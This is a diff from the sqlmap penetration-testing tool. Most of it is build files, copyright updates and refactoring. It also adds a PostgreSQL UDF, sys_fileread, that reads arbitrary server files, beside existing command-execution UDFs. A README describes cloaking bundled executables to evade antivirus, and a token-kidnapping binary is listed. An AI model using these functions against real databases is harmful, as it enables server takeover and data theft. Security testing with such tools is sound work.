+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Release|Win32.ActiveCfg = Release|Win32
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
--- a/extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys/lib_mysqludf_sys.c
+++ b/extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys/lib_mysqludf_sys.c
@@ -1,7 +1,7 @@
 /* 
 	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
 	Copyright (C) 2007  Roland Bouman 
-	Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
+	Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
 	web: http://www.mysqludf.org/
 	email: mysqludfs@gmail.com, bernardo.damele@gmail.com
 	
--- a/extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys/lib_mysqludf_sys.vcproj
+++ b/extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys/lib_mysqludf_sys.vcproj
@@ -0,0 +1,192 @@
+<?xml version="1.0" encoding="Windows-1252"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="8,00"
+	Name="lib_mysqludf_sys"
+	ProjectGUID="{4D362A3E-CA53-444C-B1C8-C49641823875}"
+	RootNamespace="lib_mysqludf_sys"
+	TargetFrameworkVersion="196613"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\include;$(MYSQL_SERVER_DIR)\include"
+				PreprocessorDefinitions="HAVE_DLOPEN"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="3"
+				WarningLevel="3"
+				DebugInformationFormat="4"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalLibraryDirectories="$(PLATFORM_SDK_DIR)"
+				GenerateDebugInformation="true"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="1"
+				EnableIntrinsicFunctions="true"
+				FavorSizeOrSpeed="2"
+				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\include;$(MYSQL_SERVER_DIR)\include"
+				PreprocessorDefinitions="HAVE_DLOPEN"
+				RuntimeLibrary="2"
+				EnableFunctionLevelLinking="true"
+				WarningLevel="3"
+				DebugInformationFormat="0"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalLibraryDirectories="$(PLATFORM_SDK_DIR)\Lib"
+				GenerateDebugInformation="false"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				OptimizeForWindows98="1"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath=".\lib_mysqludf_sys.c"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
+		</Filter>
+		<Filter
+			Name="Resource Files"
+			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
+			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
+			>
+		</Filter>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>
--- a/extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys.sln
+++ b/extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys.sln
@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual C++ Express 2005
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "lib_postgresqludf_sys", "lib_postgresqludf_sys\lib_postgresqludf_sys.vcproj", "{3527D58C-177A-47B3-981B-8104EBB3F943}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{3527D58C-177A-47B3-981B-8104EBB3F943}.Debug|Win32.ActiveCfg = Debug|Win32
+		{3527D58C-177A-47B3-981B-8104EBB3F943}.Debug|Win32.Build.0 = Debug|Win32
+		{3527D58C-177A-47B3-981B-8104EBB3F943}.Release|Win32.ActiveCfg = Release|Win32
+		{3527D58C-177A-47B3-981B-8104EBB3F943}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
--- a/extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys/lib_postgresqludf_sys.c
+++ b/extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys/lib_postgresqludf_sys.c
@@ -1,6 +1,6 @@
 /* 
 	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
+	Copyright (C) 2009-2010  Bernardo Damele A. G.
 	web: http://bernardodamele.blogspot.com/
 	email: bernardo.damele@gmail.com
 	
@@ -47,7 +47,11 @@ PG_MODULE_MAGIC;
 #endif

 PG_FUNCTION_INFO_V1(sys_exec);
+#ifdef PGDLLIMPORT
 extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
+#endif
 	text *argv0 = PG_GETARG_TEXT_P(0);
 	int32 argv0_size;
 	int32 result = 0;
@@ -72,7 +76,11 @@ extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
 }

 PG_FUNCTION_INFO_V1(sys_eval);
+#ifdef PGDLLIMPORT
 extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
+#endif
 	text *argv0 = PG_GETARG_TEXT_P(0);
 	text *result_text;
 	int32 argv0_size;
@@ -112,15 +120,22 @@ extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
 	}

 	result_text = (text *)malloc(VARHDRSZ + strlen(result));
-	//VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#ifdef SET_VARSIZE
 	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
+#else
+	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#endif
 	memcpy(VARDATA(result_text), result, strlen(result));

 	PG_RETURN_POINTER(result_text);
 }

 PG_FUNCTION_INFO_V1(sys_bineval);
+#ifdef PGDLLIMPORT
 extern PGDLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
+#endif
 	text *argv0 = PG_GETARG_TEXT_P(0);
 	int32 argv0_size;
 	size_t len;
@@ -190,3 +205,70 @@ DWORD WINAPI exec_payload(LPVOID lpParameter)
 	return 0;
 }
 #endif
+
+#undef fopen
+
+PG_FUNCTION_INFO_V1(sys_fileread);
+#ifdef PGDLLIMPORT
+extern PGDLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
+#endif
+	text *argv0 = PG_GETARG_TEXT_P(0);
+	text *result_text;
+	int32 argv0_size;
+	int32 len;
+	int32 i, j;
+	char *filename;
+	char *result;
+	char *buffer;
+	char table[] = "0123456789ABCDEF";
+	FILE *file;
+
+	argv0_size = VARSIZE(argv0) - VARHDRSZ;
+	filename = (char *)malloc(argv0_size + 1);
+
+	memcpy(filename, VARDATA(argv0), argv0_size);
+	filename[argv0_size] = '\0';
+	
+	file = fopen(filename, "rb");
+	if (!file)
+	{
+		PG_RETURN_NULL();
+	}
+	fseek(file, 0, SEEK_END);
+	len = ftell(file);
+	fseek(file, 0, SEEK_SET);
+
+	buffer=(char *)malloc(len + 1);
+	if (!buffer)
+	{
+		fclose(file);
+		PG_RETURN_NULL();
+	}
+
+	fread(buffer, len, 1, file);
+	fclose(file);
+
+	result = (char *)malloc(2*len + 1);
+	for (i=0, j=0; i<len; i++)
+	{
+		result[j++] = table[(buffer[i] >> 4) & 0x0f];
+		result[j++] = table[ buffer[i]	   & 0x0f];
+	}
+	result[j] = '\0';
+	
+	result_text = (text *)malloc(VARHDRSZ + strlen(result));
+#ifdef SET_VARSIZE
+	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
+#else
+	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#endif
+	memcpy(VARDATA(result_text), result, strlen(result));
+	
+	free(result);
+	free(buffer);
+	free(filename);
+
+	PG_RETURN_POINTER(result_text);
+}
--- a/extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys/lib_postgresqludf_sys.vcproj
+++ b/extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys/lib_postgresqludf_sys.vcproj
@@ -0,0 +1,194 @@
+<?xml version="1.0" encoding="Windows-1252"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="8,00"
+	Name="lib_postgresqludf_sys"
+	ProjectGUID="{3527D58C-177A-47B3-981B-8104EBB3F943}"
+	RootNamespace="lib_postgresqludf_sys"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\Include;$(POSTGRESQL_SERVER_DIR)\include\server;$(POSTGRESQL_SERVER_DIR)\include\server\port\win32"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="3"
+				WarningLevel="3"
+				DebugInformationFormat="4"
+				CompileAs="1"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalDependencies="postgres.lib"
+				AdditionalLibraryDirectories="$(POSTGRESQL_SERVER_DIR)\lib;$(POSTGRESQL_SERVER_DIR)\bin"
+				GenerateDebugInformation="true"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="1"
+				EnableIntrinsicFunctions="true"
+				FavorSizeOrSpeed="2"
+				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\Include;$(POSTGRESQL_SERVER_DIR)\include\server;$(POSTGRESQL_SERVER_DIR)\include\server\port\win32"
+				RuntimeLibrary="2"
+				EnableFunctionLevelLinking="true"
+				WarningLevel="3"
+				DebugInformationFormat="0"
+				CompileAs="1"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalDependencies="postgres.lib"
+				AdditionalLibraryDirectories="$(PLATFORM_SDK_DIR)\Lib;$(POSTGRESQL_SERVER_DIR)\lib;$(POSTGRESQL_SERVER_DIR)\bin"
+				GenerateDebugInformation="false"
+				SubSystem="0"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				OptimizeForWindows98="1"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath=".\lib_postgresqludf_sys.c"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
+		</Filter>
+		<Filter
+			Name="Resource Files"
+			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
+			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
+			>
+		</Filter>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>
--- a/lib/init.py
+++ b/lib/init.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
--- a/lib/contrib/init.py
+++ b/lib/contrib/init.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
--- a/lib/contrib/multipartpost.py
+++ b/lib/contrib/multipartpost.py
@@ -54,7 +54,7 @@ class MultipartPostHandler(urllib2.BaseHandler):
            
            try:
                for(key, value) in data.items():
-                    if type(value) == file:
+                    if type(value) == file or hasattr(value, 'file'):
                        v_files.append((key, value))
                    else:
                        v_vars.append((key, value))
--- a/lib/contrib/tokenkidnapping/Churrasco.exe
+++ b/lib/contrib/tokenkidnapping/Churrasco.exe
--- a/lib/contrib/upx/windows/README.txt
+++ b/lib/contrib/upx/windows/README.txt
@@ -0,0 +1,11 @@
+Due to the anti-virus positive detection of executable stored inside this
+folder,  we needed to somehow circumvent this. As from the plain sqlmap
+users perspective nothing has to be done prior to its usage by sqlmap, but
+if you want to have access to the original executable use the decrypt
+functionality of the ../../../../extra/cloak/cloak.py utility.
+
+To prepare the executable to the cloaked form use this command:
+python ../../../../extra/cloak/cloak.py -i upx.exe
+
+To get back the original executable use this:
+python ../../../../extra/cloak/cloak.py -d -i upx.exe_
--- a/lib/contrib/upx/windows/upx.exe
+++ b/lib/contrib/upx/windows/upx.exe
--- a/lib/contrib/upx/windows/upx.exe_
+++ b/lib/contrib/upx/windows/upx.exe_
--- a/lib/controller/init.py
+++ b/lib/controller/init.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
--- a/lib/controller/action.py
+++ b/lib/controller/action.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
@@ -33,6 +33,7 @@ from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.exception import sqlmapConnectionException
+from lib.core.exception import sqlmapNoneDataException
 from lib.core.session import setString
 from lib.core.session import setRegexp
 from lib.request.connect import Connect as Request
@@ -293,13 +294,19 @@ def checkStability():
    time.sleep(1)
    secondPage, _ = Request.queryPage(content=True)

-    condition = firstPage == secondPage
+    condition = (firstPage == secondPage)

    if condition:
-        conf.md5hash = md5hash(firstPage)
-
-        logMsg  = "url is stable"
-        logger.info(logMsg)
+        if firstPage:
+            conf.md5hash = md5hash(firstPage)
+            logMsg  = "url is stable"
+            logger.info(logMsg)
+        else:
+            exceptionMsg   = "there was an error checking the stability of page "
+            exceptionMsg  += "because of lack of content. please check the "
+            exceptionMsg  += "page request results (and probable errors) by "
+            exceptionMsg  += "using higher verbosity levels"
+            raise sqlmapNoneDataException, exceptionMsg

    elif not condition:
        warnMsg  = "url is not stable, sqlmap will base the page "
@@ -310,6 +317,7 @@ def checkStability():
        logger.warn(warnMsg)

    return condition
+
 def checkString():
    if not conf.string:
        return True
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
@@ -30,8 +30,8 @@ from lib.controller.checks import checkString
 from lib.controller.checks import checkRegexp
 from lib.controller.checks import checkConnection
 from lib.core.common import paramToDict
+from lib.core.common import parseTargetUrl
 from lib.core.common import readInput
-from lib.core.common import sanitizeCookie
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@@ -134,6 +134,7 @@ def start():
            logMsg = "testing url %s" % targetUrl
            logger.info(logMsg)

+        parseTargetUrl()
        createTargetDirs()
        initTargetEnv()

@@ -162,10 +163,9 @@ def start():
                        setCookieAsInjectable = False
    
                if setCookieAsInjectable:
-                    safeCookie = sanitizeCookie(cookieStr)
-                    conf.httpHeaders.append(("Cookie", safeCookie))
-                    conf.parameters["Cookie"] = safeCookie
-                    __paramDict = paramToDict("Cookie", safeCookie)
+                    conf.httpHeaders.append(("Cookie", cookieStr))
+                    conf.parameters["Cookie"] = cookieStr
+                    __paramDict = paramToDict("Cookie", cookieStr)
    
                    if __paramDict:
                        conf.paramDict["Cookie"] = __paramDict
--- a/lib/controller/handler.py
+++ b/lib/controller/handler.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
--- a/lib/core/init.py
+++ b/lib/core/init.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
@@ -26,6 +26,7 @@ import re

 from lib.core.common import randomInt
 from lib.core.common import randomStr
+from lib.core.convert import urlencode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import queries
@@ -52,6 +53,7 @@ class Agent:
        falseValue = ""
        negValue   = ""
        retValue   = ""
+        newValue   = urlencode(newValue)

        if negative or conf.paramNegative:
            negValue = "-"
@@ -453,7 +455,7 @@ class Agent:

        return inbandQuery

-    def limitQuery(self, num, query, field):
+    def limitQuery(self, num, query, field=None):
        """
        Take in input a query string and return its limited query string.

@@ -502,6 +504,12 @@ class Agent:
            if " ORDER BY " in limitedQuery:
                limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]

+            notDistincts = re.findall("DISTINCT[\(\s+](.+?)\)*\s+", limitedQuery, re.I)
+
+            for notDistinct in notDistincts:
+                limitedQuery = limitedQuery.replace("DISTINCT(%s)" % notDistinct, notDistinct)
+                limitedQuery = limitedQuery.replace("DISTINCT %s" % notDistinct, notDistinct)
+
            if limitedQuery.startswith("SELECT TOP ") or limitedQuery.startswith("TOP "):
                topNums         = re.search(queries[kb.dbms].limitregexp, limitedQuery, re.I)

@@ -517,11 +525,13 @@ class Agent:
                    limitedQuery    = limitedQuery.replace("TOP %s " % topNum, "")

            if forgeNotIn:
-                limitedQuery  = limitedQuery.replace("SELECT ", (limitStr % 1), 1)
+                limitedQuery = limitedQuery.replace("SELECT ", (limitStr % 1), 1)
+
                if " WHERE " in limitedQuery:
                    limitedQuery  = "%s AND %s " % (limitedQuery, field)
                else:
                    limitedQuery  = "%s WHERE %s " % (limitedQuery, field)
+
                limitedQuery += "NOT IN (%s" % (limitStr % num)
                limitedQuery += "%s %s)" % (field, fromFrom)

--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -5,7 +5,7 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
@@ -30,6 +30,13 @@ import string
 import sys
 import time
 import urlparse
+import ntpath
+import posixpath
+
+from tempfile import NamedTemporaryFile
+from tempfile import mkstemp
+
+from extra.cloak.cloak import decloak
 from lib.contrib import magic
 from lib.core.data import conf
 from lib.core.data import kb
@@ -37,12 +44,16 @@ from lib.core.data import logger
 from lib.core.data import paths
 from lib.core.data import queries
 from lib.core.data import temp
+from lib.core.convert import urlencode
 from lib.core.exception import sqlmapFilePathException
+from lib.core.exception import sqlmapNoneDataException
+from lib.core.exception import sqlmapSyntaxException
+from lib.core.settings import DESCRIPTION
 from lib.core.settings import IS_WIN
+from lib.core.settings import SITE
 from lib.core.settings import SQL_STATEMENTS
 from lib.core.settings import VERSION_STRING

-
 def paramToDict(place, parameters=None):
    """
    Split the parameters into names and values, check if these parameters
@@ -119,7 +130,7 @@ def formatDBMSfp(versions=None):
    @rtype: C{str}
    """

-    if not versions:
+    if not versions or versions == [None]:
        versions = kb.dbmsVersion

    if isinstance(versions, str):
@@ -213,32 +224,41 @@ def getHtmlErrorFp():

    return htmlParsed

-def getDocRoot():
+def getDocRoot(webApi=None):
    docRoot = None
-    pagePath = os.path.dirname(conf.path)
+    pagePath = directoryPath(conf.path)

    if kb.os == "Windows":
-        defaultDocRoot = "C:/Inetpub/wwwroot/"
+        if webApi == "php":
+            defaultDocRoot = "C:/xampp/htdocs/"
+        else:
+            defaultDocRoot = "C:/Inetpub/wwwroot/"
    else:
        defaultDocRoot = "/var/www/"

    if kb.absFilePaths:
        for absFilePath in kb.absFilePaths:
+            if directoryPath(absFilePath) == '/':
+                continue
+            absFilePath = normalizePath(absFilePath)
            absFilePathWin = None

-            if re.search("[A-Za-z]:(\\[\w.\\]*)?", absFilePath):
-                absFilePathWin = absFilePath
-                absFilePath    = absFilePath[2:].replace("\\", "/")
-
-            absFilePath = os.path.normpath(absFilePath)
+            if isWindowsPath(absFilePath):
+                absFilePathWin = posixToNtSlashes(absFilePath)
+                absFilePath    = ntToPosixSlashes(absFilePath[2:])
            
            if pagePath in absFilePath:
                index   = absFilePath.index(pagePath)
                docRoot = absFilePath[:index]

-                if absFilePathWin:
-                    docRoot = "C:/%s" % docRoot.replace("\\", "/")
+                if len(docRoot) == 0:
+                    docRoot = None
+                    continue

+                if absFilePathWin:
+                    docRoot = "C:/%s" % ntToPosixSlashes(docRoot)
+                    
+                docRoot = normalizePath(docRoot)
                break

    if docRoot:
@@ -259,13 +279,16 @@ def getDocRoot():

    return docRoot

-def getDirs():
+def getDirs(webApi=None):
    directories = set()

    if kb.os == "Windows":
-        defaultDir = "C:/Inetpub/wwwroot/test/"
+        if webApi == "php":
+            defaultDirs = ["C:/xampp/htdocs/"]
+        else:
+            defaultDirs = ["C:/Inetpub/wwwroot/"]
    else:
-        defaultDir = "/var/www/test/"
+        defaultDirs = ["/var/www/"]

    if kb.absFilePaths:
        infoMsg  = "retrieved web server full paths: "
@@ -274,14 +297,19 @@ def getDirs():
        
        for absFilePath in kb.absFilePaths:
            if absFilePath:
-                directories.add(os.path.dirname(absFilePath))
+                directory = directoryPath(absFilePath)
